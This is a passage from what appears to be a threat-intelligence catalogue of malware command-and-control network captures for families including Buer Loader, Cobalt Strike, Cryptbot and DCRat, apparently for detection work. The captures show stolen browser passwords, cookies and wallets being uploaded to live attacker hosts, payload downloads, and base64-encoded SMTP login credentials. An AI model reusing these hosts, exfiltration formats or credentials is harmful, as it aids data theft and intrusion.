Content-Disposition: form-data; name="file"; filename="381.zip" Content-Type: application/octet-stream PK..........>P\ZWW..........$.Browsers.txt . .........0.5.....0.5.....0.5.....s.. -N-*.IL....q,(pI,I...ON..q..O.I.q.(..M..S..*8..).%5-.4.D.,.Y..a.B.y....._.......Y..._..P.....Z..).t....TV.....@........U....mA..@n:..#..d...PK..........>P~ ......L.....$.Domains.txt . .........0.5.....0.5.....0.5.....+//.......I../J..*G. ...PK..........>Pr.............$.Outlook.txt . ..........[:......[:......[:.......,.I..s.,I......PK..........>P^.]I........ .$.Passwords.txt . .........0.5.....0.5.....0.5.......A.. .E.$....4...+S.q..+`.....0XOoMl....'...5.).s..8;b.Jpv....p8..MX......."......63'.>..{... . .........0.5.....................PK..-.........>P..............$........ ......CryptoWallets/ . ..........[:......[:......[:.....PK........... ........ -----------------------8d7a52725dea892-- HTTP/1.1 200 OK Date: Thu, 30 Jan 2020 01:53:05 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 56 Content-Type: text/html; charset=UTF-8 1,1,1,1,1,1,1,2,1,txt;cs;mp3;,https://url.com/file.exe ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/borr1.png "Borr") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/borr2.png "Borr") #### Brushaloader ~~~ POST / HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: patromink.xyz Content-Length: 47 Connection: Keep-Alive Cache-Control: no-cache k=6292&n=6292&m=6292&id=droniks34&m=6292&l=6292 HTTP/1.1 200 OK Server: nginx/1.16.1 Date: Thu, 31 Oct 2019 17:51:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Thank You 22501 ~~~ ~~~ try {"6f7074696f6e73ProcessorId"; $disks = gwmi Win32_Volume -filter "Name='C:\\'";$disks.SerialNumber}catch{"null"} 6f7074696f6e73ProcessorId 3300537927 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/brushaloader.png "Brushaloader") #### Buer Loader ~~~ GET /api/update/YzE0MTY2MGIxZWQ5YzJkMDNmMjQ4MDM0Y2RlZWI2MWM1OTEzYWJmZTIwYWE1OWNjZDFlZjM2ZmZjODViNmVjNTBjNTIyZjY5YjM1MTJiMTc2NzBlNTQwOWFjMWZiZjViZTAzNzdkNWM2NDkxOGE4ZDUwYTMxZjU5ODIzY2QxNTQyMmM5ODM0MjIwNTc5ZGIzNGJiMTMzNWNlMmJlNDJmMjBhMTA5MTVjNWQxZThmN2U0OWJjYjY0ODVjODE4NjQwYjk3YzY0NWU5NjAxNGMxY2U3NWQ2MmI5N2MwY2QzNzlhMmQ2ZmM5ZDFjZjIwNWMwMTEwNWVkNDAyZjY0ZDYyMTg0Y2UyZmJhZmEyYTQxMzBhZWRiNmY0ZjI2ZjFjZmI4MTQwMTBiYzE0Y2Y4NjBiM2U2NGE1NTBhNTc0Y2M4 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Host: loood1.top HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Nov 2019 20:00:24 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive ODMtMkQtNzItMUMtMEQtOTgtREEtOTAtMzktNjUtREYtNzYtRDktQkYtQkYtNUEtMDUtNEMtRjAtRkMtMjAtQzctMEUtQzMtRDAtODYtMzYtRTQtOTktMDAtN0YtRDAtNjQtNDctMzktMkYtRTktMTMtM0MtNDgtNjktNTQtNDEtMTktRjMtNUUtQTItNjgtQTUtMjQtNkEtNEItNzItQ0UtODUtRDQtMDAtQjctMTYtNEItOUItMDQtQzgtMTctN0UtRDgtQzctMDAtM0ItN0ItQzUtQTQtMTYtQUEtM0UtNEEtRjMtRUItNDUtQTctMEItMTctOTEtNUItNTQtNEEtODUtNzctNEEtQjUtRTYtMUMtNTktRDEtODctNDQtQkItMjAtNkQtNTgtQzEtMEEtNEItNEMtRTEtNTItM0MtRTItMkYtNTktOEUtMkUtRjItRDgtRjQtOTgtMUYtRjEtNTEtQzktMTUtNTAtQkEtNDktMkUtMzAtRDMtMjUtRDMtODctNEItQjYtRjUtN0MtMUUtMjQtRTktOTgtM0MtNTYtNjYtRTUtRDctQ0UtMDAtNUQtNkEtODUtMDEtQjEtMkMtQjctODUtMkQtMzItNjItNUEtM0UtRUQtMTYtMDYtMjYtMDYtRDMtOTYtMDMtOUEtOTEtN0MtMTUtOTEtRkYtQUItMDItQzItNzctRTItN0EtNDEtMEEtQjAtMzItOUEtMEYtRjQtMDMtNzAtMUYtMEItNTEtMDktM0EtNzQtQjEtODgtMzEtMUQtREEtQTItRjQtMzktNkUtMTctRDItRDktNTQtRDUtOEYtMDAtQkEtODEtNkUtNEUtMzUtQTMtNTItRkQtODctRTMtRDYtMkMtNTQtODctQTItNjYtQzgtM0MtMzgtQzctMEEtM0EtOUQtOEEtMzAtRTAtMDgtMzItMTAtMDgtRjItQjYtRkUtMUQtQzctQzgtQUUtOEYtNjctQUUtNTItMDUtQTktMTAtQUYtM0MtOEUtMTMtN0EtNzItM0YtMzAtRTktMzUtRDMtNTQtQkEtOEQtQzAtMzItQTctRkItNDUtQTMtNTctRTQtMUItMzAtODItNEYtOTEtOTktMUMtRDItRjgtMkEtMzYtRTItODktQjItQkItMUItNjYtQUMtMUItOEMtNjQtRUEtN0QtQkQtMkMtOTktQ0QtQzQtQkQtNzgtQzgtOUMtQjAtNkQtNTYtOEUtRDktREEtOTEtMEEtNkMtQUEtQTQtMUUtRTAtQ0MtMzMtRDMtMjAtRTItNjktMjktQzEtRTQtNjEtMTAtMjUtOTgtNjMtOEUtNTgtNzQtRjctNUEtNEYtNDktQzUtNjItNTEtNTAtNTgtNDktM0QtREQtNjctRDctNjEtMTAtMTktRkItNzUtODYtRUItMEYtQzMtRDMtQkQtMjctNkUtQzYtRDktQkYtQUUtNDAtOEEtMUEtMUQtNjctOEMtMjItNjctQjgtNUQtQzItMTUtREQtODMtNzgtNjctN0ItMTMtNDktNzMtRjMtRTAtNEYtMDUtRkYtQjktQ0ItMkEtMDctQkMtRTgtRTMtREQtMUMtNEEtQUQtQjItMTUtNUEtNDMtMTQtQUEtNDEtMUQtNzAtMUEtREQtNTQtMTYtOTAtNjctMTUtNjUtQTgtMjItMTUtMzgtRDYtNjgtOTQtNDMtNDQtQzgtNkQtMUYtNTAtNkMtMTgtMzMtQjUtNzAtOTQtMDQtNzMtRDMtNjQtMTktNDctNjYtNzgtOTEtQkUtQ0ItRTktREItNkQtODgtRkMtOTAtOTk=GET /api/download/YzE0MTY2MGIxZWQ5YzJkMDNmMjQ4MDM0Y2RlZWI2MWM1OTEzYWJmZTIwYWE1OWNjZDFlZjM2ZmZjODViNmVjNTBjNTIyZjY5YjM1MTJiMTc2NzBlNTQwOWFjMWZiZjViZTAzNzdkNWM2NDkxOGE4ZDUwYTMxZjU5ODIzY2QxNTQyMmM5ZGU0Njc4MDI5MWU2NGJhNTYyMDhiMGI4MDlhNDBkNGQ5NjQ2NWQxYjgzNzYwNmIzYjQxZTViZDU4MDE3YjQyZjZmNTVjNg== HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Host: loood1.top HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Nov 2019 20:00:24 GMT Content-Type: application/* Content-Length: 2109952 Connection: keep-alive Last-Modified: Tue, 12 Nov 2019 19:32:38 GMT .}.<,...XG.V.$.-. ..D.o...S..c].ng. .cH!.:2;.~.b..JkP...e.,k...7P.]....._0.&..p.U......=J........9?..J.@. j.^ .h....P.j.S5.q.... h..<.?*u@I^.|.......*..t..5Y.............3.:..v/.(....B.......w.\.|.C............/9...^........F....({..U.{f.c...'......9..%.Z.rJ_.....f....q.#...~..}..... ....k0#.o..............O\....w@..>....E..F.@......4..{#k.hqpxy.....}|....-....B.... ~~~ ~~~ POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Apple-iPhone7C2/1202.466; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543 Safari/419.3 Content-Length: 1046 Host: 162.244.81.87 inekece=MDllNzB&diakwadi=iMzE5OG&xycyad=NiNTYxZTcw&ohxiods=MzA0Yj&akreuq=NmZjUy&qosewyic=MzRmMTk5M&amupawel=jdjZGViY&ydsohuu=jljNzMxZDc&orbemaaf=3ZDExMmEx&inhiadfa=ZjA3MG&kyzeafu=UyYzc0M2&alnaexu=M3NGZj&idsavu=Y2VjM2RhO&nyxyygre=GY3YmR&tuxynool=hMmU3Yzc1O&myweka=DNkMDAwYWF&qeozoszi=kOGRlZD&dygyliaz=diNmZkNW&ykdovy=ZiYmVhY&yvabqua=zA4NWEzN&ugsoetl=2Y3ZDk&wymioxi=xNzIwMTIy&uqafsee=Njg1ZTYwNG&cyyqsady=M3NmQwZj&ykuweddy=hkYTQ5ZTV&emlazebe=hYzc5MGVkZ&imirdaby=mJiMzU&doyvku=wYzRhNzQ&roniym=0YTQ5ZDBi&qyaxwe=MTlmZW&uteqop=NkZjdkN2Z&noylke=lNTg5OGJmM&dedynu=DEzNjgxM&suutyfwu=DBkMjFiYm&riitoked=M3NmJjMDg&waliaw=2ZjNhNW&qiubulo=EzZGU2Zm&urehuz=UxNzhjZj&guizpuat=kzYjMzMz&ziapluc=IzODIyYT&orygybib=Y2OGUwY&ebilxufo=2RmYzllM&wesekuy=DVlZThmYTQ&buapxa=3MGVmZDM&lisoxu=xNTlkZ&usgager=TBmOTc4ZDY&cuehlumy=0ZTA5OTZlO&raxyuh=DE2MTA0YWN&piuluwyc=iYjQ4NjE0&gybetez=MzQ3ZW&isvazugo=NhZDExZGEz&obalozha=YmJjZDQ4&pivoewta=NzljOTI&dakiva=xMTE4ND&luzaih=A4OGEz&sesyaci=Mzk0ZWE1YT&opheteow=AxNjQwN&ebzyluo=zBkZWYy&osfiuk=ODc2&yzxaob=NDVmMTViNjdkZDli&exmuur=suirufy ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/buer.png "Buer Loader") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/buer2.png "Buer Loader") #### Cannibal RAT (aka Ares) ~~~ POST /api/admin_90520735581359/hello HTTP/1.1 Host: 35.192.197.199:8080 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.18.4 Content-Length: 69 Content-Type: application/json {"username": "admin", "platform": "Windows 7", "hostname": "User-PC"} ~~~ ~~~ POST /api/admin_90520735581359/report HTTP/1.1 Host: 35.192.197.199:8080 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.18.4 Content-Length: 26301 Content-Type: application/x-www-form-urlencoded output=%24+%3C%21DOCTYPE+HTML+PUBLIC+%22-%2F%2FW3C%2F%2FDTD+HTML+4.01+Transitional%2F%2FEN%22%0A++%22http%3A%2F%2Fwww.w3.org%2FTR%2Fhtml4%2Floose.dtd%22%3E%0A%3Chtml%3E%0A++%3Chead%3E%0A++++%3Ctitle%3ETypeError%3A+unsupported+operand+type%28s%29+for+%2B%3A+%27NoneType%27+and+%27str%27+%2F%2F+Werkzeug+Debugger%3C%2Ftitle%3E%0A++++%3Clink+rel%3D%22stylesheet%22+href%3D%22%3F__debugger__%3Dyes%26amp%3Bcmd%3Dresource%26amp%3Bf%3Dstyle.css%22%0A++++++++type%3D%22text%2Fcss%22%3E%0A++++%3C%21--+We+need+to+make+sure+this+has+a+favicon+so+that+the+debugger+does%0A+++++++++not+by+accident+trigger+a+request+to+%2Ffavicon.ico+which+might%0A+++++++++change+the+application+state.+--%3E%0A++++%3Clink+rel%3D%22shortcut+icon%22%0A++++++++href%3D%22%3F__debugger__%3Dyes%26amp%3Bcmd%3Dresource%26amp%3Bf%3Dconsole.png%22%3E%0A+++ HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: Ares Date: Thu, 21 Nov 2019 22:54:05 GMT ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cannibal.png "Cannibal RAT") #### Coala Bot Uses fake 404 ~~~ POST /jjj888/skghn.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/12.0.1576.62 Safari/537.26 Content-Type: application/x-www-form-urlencoded Host: 185.170.43.187 Content-Length: 120 Expect: 100-continue Connection: Close HTTP/1.1 100 Continue Jk1pY3Jvc29mdCBXaW5kb3dzIDcgUHJvZmVzc2lvbmFsIHgzMiZhZG1pbiY4NjNCLUJFQUItOEZDNi0yMEJGLTlDMDktMkY1NS01OEUxLUExRDYmRmFsc2U( HTTP/1.0 404 Not Found Date: Tue, 15 Jan 2019 13:20:17 GMT Server: Apache/2.4.10 (Debian) Set-Cookie: PHPSESSID=euhbs94osbalc0ubsfl5c2v324; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 88 Connection: close Content-Type: text/html; charset=UTF-8 MTAzNDE2MzR0MTdoYWhkQkZ1amRmYnd1cmhmbmllZmhydWZoYm5maGdmeVREZmJHRlZ5V2d2ZnwxNTQ3NTU4NDE3 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/coala.png "Coala Bot") #### Cobaltstrike ~~~ GET /Mdt7 HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; NP06) Host: 198.199.89.56 Connection: Keep-Alive Cache-Control: no-cache HTTP/1.1 200 OK Date: Wed, 16 Oct 2019 00:03:32 GMT Content-Type: application/octet-stream Content-Length: 213589 ....... w.z....=..........C.D.'.'Z.2....:1....R..1...1.......1.9.t...^.......3.Q.3.R.~...~..........6a..6a-L^.............................................`.....W...?...O...=...^...1...T...:.......:..._...U...U...U.v.......v......,9 .W.E.3k..a....9..l.T..k...........J......;J.._.k...$......J....h...'..qD GET /push HTTP/1.1 Accept: */* Cookie: TwJl1o2Nzk3+xmC39FsNTbyJPGHyNxllFZ8wZUwR831SYmTwrxoGydXQGF1ej89K1t0rTLgzjd95c8127hlZ6SQ4hx95YrYuRHooitXYGEAxtbKv53LJ6K+6r1y1OQU3n0+O93xxPiyx6RvPeKzlACbO4nEc5YKzh0vAfWJvlm0= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENXA) Host: 198.199.89.56 Connection: Keep-Alive Cache-Control: no-cache HTTP/1.1 200 OK Date: Wed, 16 Oct 2019 00:05:35 GMT Content-Type: application/octet-stream Content-Length: 0 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cobaltstrike.png "Cobaltstrike") Amazon c2 profile ~~~ GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Host: www.amazon.com Accept: */* Cookie: skin=noskin;session-token=MM4bZQ5WUPUrn7TPQuCWct6G+WGXZaLdezMQVEv8PHnB7tnvTk7ct3W71pQmn2NMJQD7IFbjPnKJV27tKshA8AjgzpXoeUtOIrDiBEg0x3AesYq52s74IbjnsVA+wASo0D6L23fd87XNDUiBro5wNBzcybUOADAO1fjCobw5MAw=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache HTTP/1.1 200 OK Date: Fri, 13 Dec 2019 17:48:39 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN Content-Encoding: gzip Content-Length: 0 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cobaltamazon.png "Cobaltstrike") Safebrowsing c2 profile ~~~ GET /safebrowsing/ref/eNKSXUTdWXGYAMHYg2df0Ev1wVrA7yp0T-WrSHSB53oha HTTP/1.1 Accept-Language: en-US Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip Host: novote.azureedge.net Cookie: PREF=ID=foemmgjicmcnhjlacgackacadbclcmnfoeaeeignjhiphdgidlmahkgbchcahclpfcadjnegckejpiofbmllpnaeancgbikcdjohkekapgnkgiijobnknkgiahmkcjipnncehcamnopcmlngcboppjdplhhobhgekdcblgpkdggeklenpcabdkhhhaedogkacljhdgdphfanfbmcbnkgjmplhdkomllhnnoppchchejooiplahpgpmfaegdcpbnd User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Connection: Keep-Alive Cache-Control: no-cache HTTP/1.1 200 OK Content-Encoding: gzip Age: 1609 Alternate-Protocol: 80:quic Cache-Control: public,max-age=172800 Content-Type: application/vnd.google.safebrowsing-chunk Date: Fri, 22 Nov 2019 13:34:50 GMT Server: ECAcc (frb/67BC) X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Content-Length: 82480 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cobalt-safe.png "Cobaltstrike safebrowsing") #### Cobian RAT ~~~ ...........................LOGIN|-|ROOT02_392170|-|JONATHAN-PC@Jonathan|-|Microsoft Windows 7 Professional |-|No|-|1.0.20.0 [Black]|-|Program Manager|-|ROOT02_392170,goodattack.duckdns.org,4007,svchost.exe,{VYFGJQ0V-30663-BEMNQX-BEMNQX0BNF},TEMP,False,False,|-|. ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cobian.png "Cobian RAT") #### Collector Project ~~~ GET /get_data.php?info HTTP/1.1 User-Agent: CLCTR Host: u667503gif.ha004.t.justns.ru Connection: Keep-Alive HTTP/1.1 200 OK Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 66 Date: Fri, 24 Apr 2020 16:45:45 GMT Server: LiteSpeed Vary: User-Agent IP-address: 85.203.44.133_=_Country: Netherlands_=_City: Amsterdam POST /get_data.php?id=1874255356&cc=0&pc=1&hash=8f41bab4341b7ac42eb623fad118f430 HTTP/1.1 Content-Type: multipart/form-data; boundary=SendFileZIPBoundary User-Agent: uploader Host: u667503gif.ha004.t.justns.ru Content-Length: 1191921 Connection: Keep-Alive Cache-Control: no-cache --SendFileZIPBoundary Content-Disposition: form-data; name="fileToUpload"; filename="zipfile.zip" Content-Type: application/zip PK...........P.w..B*..........Screenshot.pngUT ...%.^.%.^.%.^$.uXS........n. .......P........!.H...}. *9JB....5:Fm0.........:;...9.....W,...!= .O_c.).c.....y>...k...?u...n.5..........k...../...#*.........pt]3.n\g...?PK...........P....I...........Browsers/passwords.txtUT ...%.^.%.^.%.^. ..R.())(.....KKLNM....K.......O.......V:.....y........R...@..../W<.....PK...........P ...7...........Browsers/AutoFill.txtUT ...%.^.%.^.%.^.K.M.Rp.,*...2y...sJ."..IE..9.\...^.?..>.hF.%..e...Sd6.PK...........P................Browsers/!browsersInfo.txtUT ...%.^.%.^.%.^.............\.c..)....v.. -N-*.IL....q,(pI,I...ON..q..O.I.q.(..M..S.....%....U.g...b.tu.....K.J...cy.x...;......... .........Cc...&a...Q^ ru..qv$&F.PK...........P..m. ...}.......information.txtUT ...%.^.%.^.%.^-.Oo.0......|..D4.?. u 6UP."....x..6U.`.../..|...Y/q...UV.J(..g ...8.r.....!.k.`.Y.)$s.NC........{.+..$.2c.......&..*........Q.U..l....&..^+M_Jk..~..?......D}pd]..Qm...w.X.........6...OW.s6c .. /.`..w..U9*..?..o.}.Q..1|Ver-3.1||||C:\ProgramData\Dhrolas\|subdomain.....getavs=avpro.....subdomain-getavs=@....264>smss>0><352>explorer>0><796>svchost>0><348>csrss>0><1232>svchost>0><608>svchost>0><3720>windanr>0><692>svchost>0><708>ctfmon>0><864>svchost>0><1872>SearchIndexer>0><3520>SearchFilterHost>0><1384>IMEDICTUPDATE>0><404>csrss>0><1204>spoolsv>0><3484>SearchProtocolHost>0><1824>svchost>0><396>wininit>0><840>svchost>0><1460>qemu-ga>0><2704>audiodg>0><1000>svchost>0><1944>886c394c284f3f334c0e385fe36ec1022037585810b9e39629fcbdc2ac4d27e1>0><464>lsm>0><552>winlogon>0><1352>svchost>0><280>dwm>0><1080>svchost>0><456>lsass>0><4>System>0><448>services>0><2032>taskeng>0><0>Idle>0>< ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/crimson.png "Crimson RAT") #### Cryptbot ~~~ POST /index.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------j3v66jdmskc244S User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Host: saas01.pro Content-Length: 50253 Cache-Control: no-cache -----------------------------j3v66jdmskc244S Content-Disposition: form-data; name="file"; filename="C:\ProgramData\AaZ2SXQu2BSEGVOA\SS5KbUwQhOLk.zip" Content-Type: application/octet-stream PK.........S_O\...........4...Browsers/Cookies/Mozilla_Firefox_Cookies_fmcIYbZ.txtUT .....]...]...]..KO.@......SZ...hg. ..!<..n.<..P.....^.n.....|....7.W}:..=..e.....4Yl..S.\I..n...z......C..G.....F.,O....*..]gg........<.t>.=.......fY..ce2...Uo..t...6..$!.$...q<. ..y.KF. p.h$.$..V.Ht".,../.-K.'T..p..B[c........?...&.S.."...b.J.T......(...!B.E1...D\!*N.!....PK.........S_O..K.............Browsers/_FileCookies.txtUT .....]...]...]..KO.@.......t.....%&H"...J.!3S.0.60......;......ht.\x.}5.....b/...=...|3a. .Zi.v...0...pj....=.]..<...........D...g=o.5..!..}...M..k..s......Y1,7........&.s. ....W.G..yn*F.$...$...wN.LL.J,%.(.-K}A.......q..h.J....?T.M...'.L)!".JK...p7..?.A!o...Ql8l....Z...0.}.PK.........S_OFq..O...h.......Browsers/_FileForms.txtUT .....]...]...].K.M.Rp.,*...2...j.8,1..(...T.......V...MQPbJQfz~1/./.SQ~yqj...o~UfNN"..... ^..PK.........S_OE.%.{...........Browsers/_FilePasswords.txtUT .....PA..N6.....).......a.?.C.........g.|......kiQ......^.."./.......:.R.y...7...]}.45.{.D..S]......d*nY.q!.3........P.R.C.....G.B ."...;.o.5....iU.;....$}._..&...e@...wF..PK...........S_O\...........4. ....... .......Browsers/Cookies/Mozilla_Firefox_Cookies_fmcIYbZ.txtUT......]PK...........S_O..K........... ....... ...g...Browsers/_FileCookies.txtUT......]PK...........S_OFq..O...h..... ....... .......Browsers/_FileForms.txtUT......]PK...........S_OE.%.{......... ....... ...I...Browsers/_FilePasswords.txtUT......]PK...........S_OE.%.{......... ....... ......._FilePasswords.txtUT......]PK...........S_O..... ..Fk.. . ....... ......._Info.txtUT......]PK...........S_O..=mK......... ....... ......._Screen.jpgUT......]PK..........&......... -----------------------------j3v66jdmskc244S-- HTTP/1.1 200 OK Server: nginx Date: Thu, 31 Oct 2019 10:30:07 GMT Content-Length: 3 Connection: keep-alive X-Powered-By: Express ok! ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cryptbot.png "Cryptbot") #### Danabot Not real TLS traffic, flag on "24 01 00 00" pattern and 24 byte first packet ~~~ 00000000 24 01 00 00 00 00 00 00 e5 7c 00 00 00 00 00 00 $....... .|...... 00000010 09 7e 00 00 00 00 00 00 .~...... ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/danabot.png "Danabot") #### Darkcloud-fg ~~~ 220-sg2plzcpnl456444.prod.sin2.secureserver.net ESMTP Exim 4.95 #2 Mon, 06 Feb 2023 08:00:59 -0700 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail. EHLO DESKTOPJGLLJLD 250-sg2plzcpnl456444.prod.sin2.secureserver.net Hello DESKTOPJGLLJLD [45.86.200.53] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP AUTH LOGIN 334 VXNlcm5hbWU6 aW5mb0BrcmlvbmNvbXB1dGVyLmNvbQ== 334 UGFzc3dvcmQ6 cWhyVlNDSyYm 235 Authentication succeeded MAIL FROM: 250 OK RCPT TO: 250 Accepted DATA 354 Enter message, ending with "." on a line by itself thread-index: Adk6O9KSWRF117oSS/+EnKkCJKo7kA== Thread-Topic: DC-FG:::DESKTOP-JGLLJLD\admin\45.86.200.110 From: To: Subject: DC-FG:::DESKTOP-JGLLJLD\admin\45.86.200.110 Date: Mon, 6 Feb 2023 15:00:59 -0000 Message-ID: <4A2332A508DC4B61B8ACDBC8A9CD1E68@DESKTOPJGLLJLD> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0000_01D93A3B.D2A2B3E0" X-Mailer: Microsoft CDO for Windows 2000 Content-Class: urn:content-classes:message Importance: normal Priority: normal X-MimeOLE: Produced By Microsoft MimeOLE This is a multi-part message in MIME format. ------=_NextPart_000_0000_01D93A3B.D2A2B3E0 Content-Type: text/plain Content-Transfer-Encoding: 7bit ------=_NextPart_000_0000_01D93A3B.D2A2B3E0 Content-Type: application/x-zip-compressed; name="Files.zip" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="Files.zip" UEsDBBQAAAAIANaRa090OBjdswQAADkMAAAZAAAARmlsZXMvYXV0aG9yZ2FsbGVyaWVzLnJ0Zq1W ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/darkcloud-fg.png "Darkcloud-fg") #### Darkcomet ~~~ BF7CAB464EFBA57DAD495BECB15D8B4C57F0BE821AEF052DF1C27F08DDFC328EB3FE9F5699707BCDC8C751A55F2CE98F3201C7FC248AA8FC340C2F20D8436FEDEAF457052D53A8F4BFF6568F5D644E03BDB309B022A095BBC95AECE9ACB25EFD2BA04271017BADF1C0D75325C58BB1A8E3C42814BA1D830DF380472AFFBC7F034344A76764BFCC2DC473B6836F4CF2D8518E9CA4A32A3C5FA402FA2837A9BEE006127A5E073F925EC3F95F680D25EB86F58C423E5C645340002B677EA40FE1648BAE9D11EA4BC915D6E53CEF98429542C22BD7439A33FFE8B48BE44AD038C62AA82985A15A0F7F9E342D9F81EB0DB396D2589D80F51FEE9B296FCCE117FCCC25EB8445EFE7617E0930C3FC1931227EC1E2AC401B18E0AE61924E7402CFBB418711F39C890EB6AAD843903AE1D39A0DF31AFFDECA82F3FA48EB19D122088C809D5CEA3F4C59E8C8D57AB04B3DFDE3DD47B37878AD856643B46CAD5A4DEBC3E677BA446EBAD350549BB36FC8FAAE784C7C1EC91932AEB6A3014F3C11FDB9EBA711B7517E0C4EEFA15FF93BDBE8D0E716D8C7E5F3 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/darkcomet.png "Darkcomet") #### Darkrat ~~~ POST /request HTTP/1.1 Accept: text/plain Content-Type: application/x-www-form-urlencoded User-Agent: agent Host: 104.244.75.179 Content-Length: 640 request=YUhkcFpEMDVNREExT1dNek55MHhNekl3TFRReFlUUXRZalU0WkMweVlqYzFZVGs0TlRCa01tWW1ZMjl0Y0hWMFpYSnVZVzFsUFZWVFJWSXRVRU1tWVc5eWJtOTBQV1poYkhObEptbHVjM1JoYkd4bFpGSmhiVDB6TGpRNU9UWXhPU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDEwY25WbEptRnVkR2wyYVhKMWN6MG1ZbTkwZG1WeWMybHZiajB5TGpJdU1DWm5jSFZPWVcxbFBXUkhPV3RpZHowOUptTndkVTVoYldVOVUxYzFNRnBYZDI5VmFXdG5VVEk1ZVZwVGFGVlVVMnRuWVZSVmRFNXFVWGROUTBKRVZVWlZaMUZEUVhsTWFtTjNVakJvTmlaaGNtTm9QV1ZFWnpJbWIzQmxjbWx1WjNONWMzUmxiVDFXTW14MVdrYzVNMk41UVROSlJrNXNZMjVhY0ZreVZXZFZSMFpxWVhsQmVDWnpjSEpsWVdSMFlXYzljR0ZzYVhkaA== HTTP/1.1 200 OK Date: Tue, 08 Oct 2019 11:25:25 GMT Server: Apache/2.4.25 (Debian) Set-Cookie: PHPSESSID=hikrbr50pt7ggjr4rcbg40bvl6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 0 Content-Type: text/html; charset=UTF-8 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/darkrat.png "Darkrat") #### DCRat ~~~ GET /ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/56743785cf97084d3a49a8bf0956f2c744a4a3e0.php?data=active HTTP/1.1 Host: domalo.online Connection: Keep-Alive GET 